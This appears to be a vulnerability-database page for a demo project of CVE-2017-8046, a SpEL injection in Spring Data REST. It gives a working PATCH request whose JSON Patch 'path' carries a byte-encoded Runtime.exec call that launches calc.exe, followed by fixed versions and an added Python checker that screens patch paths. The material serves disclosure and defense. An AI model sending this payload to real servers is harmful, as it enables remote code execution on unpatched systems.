Related vulnerability
Description
SPRING DATA REST CVE-2017-8046 DEMO
Introduction
# Spring Data REST CVE-2017-8046 demo test

Please UPGRADE Spring Data REST NOW.

## steps
* Start this application
* Create a test instance
```http
POST /entityPersons/ HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Cache-Control: no-cache

{
  "firstName":"f2"
}
```
* Exploit the SpEL injection; this launches C:\Windows\system32\calc.exe
```http
PATCH /entityPersons/1 HTTP/1.1
Host: localhost:8080
Content-Type: application/json-patch+json
Cache-Control: no-cache

[
{
"op":"test",
"path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[] {67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 115, 121, 115, 116, 101, 109, 51, 50, 92, 99, 97, 108, 99, 46, 101, 120, 101} ))",
"value":""
}
]
```
## upgrade to
* Spring Data REST 2.5.12, 2.6.7, 3.0 RC3
* Spring Boot 2.0.0.M4
* Spring Data release train Kay-RC3

Spring Boot 1.5.7.RELEASE uses `Spring Data REST 2.6.7`, but Spring Boot 1.4.x does not upgrade its Spring Data REST version.
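
A request-screening check for JSON Patch bodies such as the PATCH request in the steps above, added here as an example (it is not part of the original demo project or of Spring Data REST): it flags any `path` or `from` that is not an RFC 6901 JSON Pointer over known property names. `ALLOWED_PROPERTIES` and the function names are assumptions; `firstName` is the only property the page shows.

```python
import json
import re

PATCH_MEDIA_TYPE = "application/json-patch+json"
# Assumption: firstName is the only property the page shows (in the POST body);
# list every exposed property of the real entity here.
ALLOWED_PROPERTIES = {"firstName"}
_INDEX = re.compile(r"(0|[1-9][0-9]*|-)\Z")   # array index or "-" (append)
_BAD_ESCAPE = re.compile(r"~(?![01])")        # RFC 6901 allows only ~0 and ~1


def pointer_segments(pointer):
    """Split an RFC 6901 JSON Pointer into unescaped segments or raise ValueError."""
    if not isinstance(pointer, str) or (pointer and not pointer.startswith("/")):
        raise ValueError("is not a JSON Pointer")
    if _BAD_ESCAPE.search(pointer):
        raise ValueError("has an invalid '~' escape")
    return [s.replace("~1", "/").replace("~0", "~") for s in pointer.split("/")[1:]]


def check_patch(content_type, body, allowed=ALLOWED_PROPERTIES):
    """Return findings for a request; an empty list means the patch looks well-formed."""
    if content_type.split(";")[0].strip().lower() != PATCH_MEDIA_TYPE:
        return []
    try:
        ops = json.loads(body)
    except ValueError:
        return ["body is not valid JSON"]
    if not isinstance(ops, list):
        return ["JSON Patch document is not an array"]
    findings = []
    for i, op in enumerate(ops):
        pointers = [(k, op[k]) for k in ("path", "from") if k in op] if isinstance(op, dict) else []
        if not any(k == "path" for k, _ in pointers):
            findings.append(f"op {i}: missing path")
        for key, value in pointers:
            try:
                bad = [s for s in pointer_segments(value) if s not in allowed and not _INDEX.match(s)]
            except ValueError as exc:
                findings.append(f"op {i}: {key} {exc}")
                continue
            findings.extend(f"op {i}: {key} has unknown segment {s!r}" for s in bad)
    return findings


# Constructed samples: a normal patch and two harmless expression-shaped paths.
GOOD = '[{"op": "replace", "path": "/firstName", "value": "f3"}]'
NO_SLASH = '[{"op": "test", "path": "T(java.lang.Math).abs(1)", "value": ""}]'
WITH_SLASH = '[{"op": "test", "path": "/T(java.lang.Math).abs(1)/firstName", "value": ""}]'
```

The property allowlist matters as much as the pointer syntax check, since a syntactically valid pointer can still carry an expression-shaped segment.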
File snapshot
```
[4.0K] /data/pocs/0dc87e9ebeed247599c11374d6c585165d1e3fd8
├── [6.3K] mvnw
├── [4.9K] mvnw.cmd
├── [1.9K] pom.xml
├── [ 978] README.md
└── [4.0K] src
    ├── [4.0K] main
    │   ├── [4.0K] java
    │   │   └── [4.0K] org
    │   │       └── [4.0K] fornever
    │   │           └── [4.0K] cve
    │   │               ├── [ 946] CVEApplication.java
    │   │               ├── [1.5K] EntityPerson.java
    │   │               └── [ 193] PersonRepository.java
    │   └── [4.0K] resources
    │       └── [   0] application.yml
    └── [4.0K] test
        └── [4.0K] java
            └── [4.0K] org
                └── [4.0K] fornever
                    └── [4.0K] cve
                        └── [ 330] CVEApplicationTests.java

12 directories, 9 files
```